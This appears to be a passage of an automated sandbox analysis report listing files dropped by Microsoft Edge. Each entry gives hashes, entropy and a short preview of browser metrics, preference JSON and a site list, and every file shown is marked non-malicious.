                                                                                                                                                      Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):107893
                                                                                                                                                      Entropy (8bit):4.6401415786958475
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7L:fwUQC5VwBIiElEd2K57P7L
                                                                                                                                                      MD5:8574D972959B295FEA388493B825FDF1
                                                                                                                                                      SHA1:388510DBD841625F1DFFC1347A4C41B8AF07B23C
                                                                                                                                                      SHA-256:8520149C20006B78EBBDCD489C459D56B922C235102433F8D4C5A440ABA6E776
                                                                                                                                                      SHA-512:E50D2B5D7ED6A634865875A570CA441CD6C3AA68ED181C4329E2BDE3AA06929DA02E4D1900691C88B3D7A501AB5223140969CCDE4C2B670F0937A2A75DFA763D
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):4194304
                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3::
                                                                                                                                                      MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                      SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                      SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                      SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):4194304
                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3::
                                                                                                                                                      MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                      SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                      SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                      SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):4194304
                                                                                                                                                      Entropy (8bit):0.03964246508186236
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:Y5Q01utmqvDzKX7ezJ8iD12absbZHtgbXPh8IYhHBNELi/cRQMceQ9Rbn8y08Tcp:V0EtJzlWCahhxQH8b08T2RGOD
                                                                                                                                                      MD5:660867A8B732EE94E903A48DABB5E045
                                                                                                                                                      SHA1:A019A26189F170C6302CE4651872DEB0FA60A07F
                                                                                                                                                      SHA-256:9ABB0826799435508B90160B818010261E68A9666AF86C6A2D591110A5EE65D1
                                                                                                                                                      SHA-512:1DA973E9347D436967235BD119C5CEF27F287F0D2A114E4DE8593EB19B060791A690E7753841042CE233CDAA04494EFE96B0C8767CDD61FC923336CA531E774F
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:...@..@...@.....C.].....@................a...P..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....i.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".bikjyq20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@............./......................w..Uu.$r.>.........."....."...2...".*.:............B)..1.3.147.37.. .*.RegKeyNotFound2.windowsR...Z.....K7..E@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z...................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):4194304
                                                                                                                                                      Entropy (8bit):0.3745376918065009
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3072:wmvPVZ8xXxj8lAzzbjTMUuwKWqnCwDUMcvtdOWlUg1HFF:ZVuXxglWzXTMUXjqn8vtdpUaHz
                                                                                                                                                      MD5:8C950E5D74D75C3C9D19DB11EC100EDA
                                                                                                                                                      SHA1:78C1802442AA9EA616EAD7A4691A79966D461CA4
                                                                                                                                                      SHA-256:977F48321E47C68FFF903FFF0FE5EB9B86CC60E8DA81428DC9B7D1BA043101CF
                                                                                                                                                      SHA-512:5E44B94F73E706C91992D4C57066FB4430DBFE85C2FFCD110275A7342A49771D29223D4F3E6D5063E6B68284CFF90FA9C05B0C15EB3B8D267FEC3946C999E3D6
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:...@..@...@.....C.].....@................-.. -..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....m.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".bikjyq20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@............./......................w..U?:K.u.$r.>.........."....."...2...".*.:............B)..1.3.147.37.. .*.RegKeyNotFound2.windowsR...Z.....K7..E@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z............<..8...#...msNurturingAssistanceHomeDependency.....triggered....(..
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):4194304
                                                                                                                                                      Entropy (8bit):0.040916923464574054
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:L80EbtmqvDtKX7qJEa3XxxTxqZ/g+Xt970R6EqhTS7NonUT1gQ8oh4n8y08Tcm2D:I0EtleK8YcFhIsigEh408T2RGOD
                                                                                                                                                      MD5:239FAD3BBFAB348118F671D464856266
                                                                                                                                                      SHA1:93CBCBCED2CD568B41E18BB8CA44B40765C9C348
                                                                                                                                                      SHA-256:6AD6E9BC7591EB363609712E9F2F5EFA0B1C66C47F019902895F57E7F684DC88
                                                                                                                                                      SHA-512:47D1405252523BB74E5FDDCE978FA42E31561A0762F2A9276322CC5A09A185A0A4B3DCE5ECD8E8FB796503B96878207E1C30F043D900EFFAE98F704CA0E1025B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:...@..@...@.....C.].....@................`...P..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....q.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".bikjyq20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@............./......................w..U].0r........>.........."....."...2...".*.:............B)..1.3.147.37.. .*.RegKeyNotFound2.windowsR...Z.....K7..E@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z...........................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):4194304
                                                                                                                                                      Entropy (8bit):0.03978369063963121
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:LGC0EbtmqvD3KX7yJEa3Xxx7uqZGXPtg34khtbNE3nnI1gQMu1oeXn8y08Tcm2Rl:KC0Etve18xphlCggi1f08T2RGOD
                                                                                                                                                      MD5:66DD88D9557AC4D5850D78125E6A13E6
                                                                                                                                                      SHA1:49FEB32A04DC5DBDBC73E1D24E4603887FBF5C38
                                                                                                                                                      SHA-256:A89FCB51F3A19A338677CCA778DA5FD00A2BC94B28CBF6E8F1058519226723A2
                                                                                                                                                      SHA-512:5C6E26DCA3E9946BD4416328418A1BB9E59152C8DC74E245520E28583FE106599CC14FF00514E58258D1F0E69B983FDF53E0516130669002C409EA978DE6A97B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:...@..@...@.....C.].....@...............h^.. N..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....q.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".bikjyq20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@............./......................w..U].0r........>.........."....."...2...".*.:............B)..1.3.147.37.. .*.RegKeyNotFound2.windowsR...Z.....K7..E@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z...........................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):16384
                                                                                                                                                      Entropy (8bit):0.3553968406659012
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:biUXhV0xosU8xCe+JKlkQuMRxCb8ZXfgYJ0IJpP0KLsyW1L7Fx6:bFRqxosU8xWMk8xVZ4YWI30otWn
                                                                                                                                                      MD5:CFAB81B800EDABACBF6CB61AA78D5258
                                                                                                                                                      SHA1:2730D4DA1BE7238D701DC84EB708A064B8D1CF27
                                                                                                                                                      SHA-256:452A5479B9A2E03612576C30D30E6F51F51274CD30EF576EA1E71D20C657376F
                                                                                                                                                      SHA-512:EC188B0EE4D3DAABC26799B34EE471BEE988BDD7CEB011ED7DF3D4CF26F98932BBBB4B70DC2B7FD4DF9A3981B3CE22F4B5BE4A0DB97514D526E521575EFB2EC6
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:...@.@...@..............@...................................`... ...i.y.........CrashpadMetrics.....i.y..Yd.h.......A.......e............,.........W.......................W....................Microsoft.UMA.PersistentAllocator.CrashpadMetrics.UsedPct.......h...i.y.[".................................!...&...+...0...6...;...@...E...K...P...U...Z...`...e...........i.y..Yd.........A............................E.[4.f..................E.[4.f.................Microsoft.UMA.PersistentAllocator.CrashpadMetrics.Errors............i.y..Yd.........A..................._..-`....h-.....................h-....................Crashpad.HandlerLifetimeMilestone.......0...i.y.[".........................................i.y..Yd.@.......C...........................VM....],................WM....],................Stability.BrowserExitCodes...... ...i.y......VM....],........H...i.y.1U!S............................................................ ...i.y...0...WM....],........................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):280
                                                                                                                                                      Entropy (8bit):3.060980776278344
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:FiWWltl/9UgBVP/Sh/JzvLi2RRIxINXj1J1:o1//BVsJDG2Yq
                                                                                                                                                      MD5:74B32A83C9311607EB525C6E23854EE0
                                                                                                                                                      SHA1:C345A4A3BB52D7CD94EA63B75A424BE7B52CFCD2
                                                                                                                                                      SHA-256:06509A7E418D9CCE502E897EAEEE8C6E3DCB1D0622B421DD968AF3916A5BFF90
                                                                                                                                                      SHA-512:ADC193A89F0E476E7326B4EA0472814FE6DD0C16FC010AAF7B4CF78567D5DF6A1574C1CE99A63018AFE7E9AD68918147880621A3C00FAA7AD1014A0056B4B9C4
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:sdPC......................5.y&.K.?....................................................................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................48ea0ba2-e9bb-4568-92cb-0f42a5c5d505............
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):39694
                                                                                                                                                      Entropy (8bit):5.562611448443283
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:768:h8s57cW7pLGLPlLWPd5fYI8F1+UoAYDCx9Tuqh0VfUC9xbog/OVTaAHBpYrwGts+:h8s57c2cPlLWPd5fYIu1ja+aAhpJGtGM
                                                                                                                                                      MD5:6B9C988DBA867DE59520AE165175C962
                                                                                                                                                      SHA1:4E251BC3A74EF0D69C03A2F09EB1E4630A007338
                                                                                                                                                      SHA-256:717F63EB559D7F8980E8BB0709395BDCAB93E070913F0510BC7C188CAECFC7F9
                                                                                                                                                      SHA-512:451C466195365B996E23A0AAE1864685F96FBBEFE5848E2142B29091043A07474EDCDC22E0DAFCB2F342162C0315FB0DCF63936A592627CC577D01AD87826B79
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13377790691749887","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13377790691749887","location":5,"ma
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):9560
                                                                                                                                                      Entropy (8bit):4.927538399430544
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:sVC/SNo8oSHJ1u9b98cjaYSv3CG85Bh6Cp9/x+6M8muecmAeCgp+2O8QdBR2e4zc:sVISnJ+jaY8378tpj+FVAgOna291f
                                                                                                                                                      MD5:797895882111EAEB8A4CC35BDF76AB83
                                                                                                                                                      SHA1:B62C7ED9AA3D37F3512DE0A3FACA788015DD8254
                                                                                                                                                      SHA-256:03BA97F85E559F1FB5E1FF58DE43C1A76D2007BF6A5B157502B133F67DE35EF1
                                                                                                                                                      SHA-512:24044D0F00DD460AAB2900CD38BD5DF896F7EF78BAB3DC779273406F2922A071E1CE0E7CE4F43B5D25601342316DE04E27F10FA153D570F4852F09EFBAED430F
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13377790692220765","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1024,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):115717
                                                                                                                                                      Entropy (8bit):5.183660917461099
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                      MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                      SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                      SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                      SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1
                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:L:L
                                                                                                                                                      MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                      SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                      SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                      SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:.
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):12169
                                                                                                                                                      Entropy (8bit):5.060255570137643
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:sVEJ9pQTryZilba4uy8J+jaY8378tpj+FVAgOna291f:sVELAfuvJ+jTpUVZOaY
                                                                                                                                                      MD5:BA44EFD111F6877F44DA8F9FB89951B5
                                                                                                                                                      SHA1:8DEA1277906926BE476AC7E00EE5A028FADF9EC0
                                                                                                                                                      SHA-256:DC6FFE7EEE216811604F710511A2AAB685F187FA61D411A20C8D36ABFC0A18DC
                                                                                                                                                      SHA-512:AD611600F100AF599716CF1718285B1EBF77F291D350EA71701BE05B89B4030B960EF8D66997038BEE3CB312BF50738842BEEB1A13A9998F49E2B616C033FC69
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13377790692220765","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):13516
                                                                                                                                                      Entropy (8bit):5.229983032568182
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:sVEJ9pQTryZilba4uy8J+jXXsdY8378tpj+FVAF/O2h291f:sVELAfuvJ+jHHpUVQ/OmY
                                                                                                                                                      MD5:DF8CC058DC89E5E055D700967685EF0F
                                                                                                                                                      SHA1:6F4EACFEC098DC82A508D96F4DB21AFC6EA7F0C3
                                                                                                                                                      SHA-256:7BCCB9FA3FC4B626296977E15D0B5A9FA7ABE07DA0AD692503AAB9967F4EE225
                                                                                                                                                      SHA-512:6D5BC3E72207FF1DBF23CF827A4E24BF29862ECC89BB30AD99B55BB961C6F146F6BD438949A5EE0D43C79C303AA6F4CEF415B0C5286906D26595112F80F28A45
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13377790692220765","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1
                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:L:L
                                                                                                                                                      MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                      SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                      SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                      SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:.
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):13406
                                                                                                                                                      Entropy (8bit):5.231592076186532
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:sVEJ9pQTryZilba4uy8J+jXXsdY8378tpj+FVAxOna291f:sVELAfuvJ+jHHpUVCOaY
                                                                                                                                                      MD5:8EE62995D553426A7EDB44825DC6E1A4
                                                                                                                                                      SHA1:30D8DABB506E58D22EAACB30A1355B03C6D78C52
                                                                                                                                                      SHA-256:EF60C2E3E851A11DF107B00EC3E5A401F16C915350C2BBBB5A197312730A508B
                                                                                                                                                      SHA-512:5C5A95E97630E56AC92E8B3E57FC69F9C308806B1CAFB67D28C485C9692DE079DC6B317B18FFA2A0451264972B9C5DF46F75AA729F69CC61CD9562E68F280FD0
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13377790692220765","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):34636
                                                                                                                                                      Entropy (8bit):5.560334536373844
                                                                                                                                                      Encrypted:false
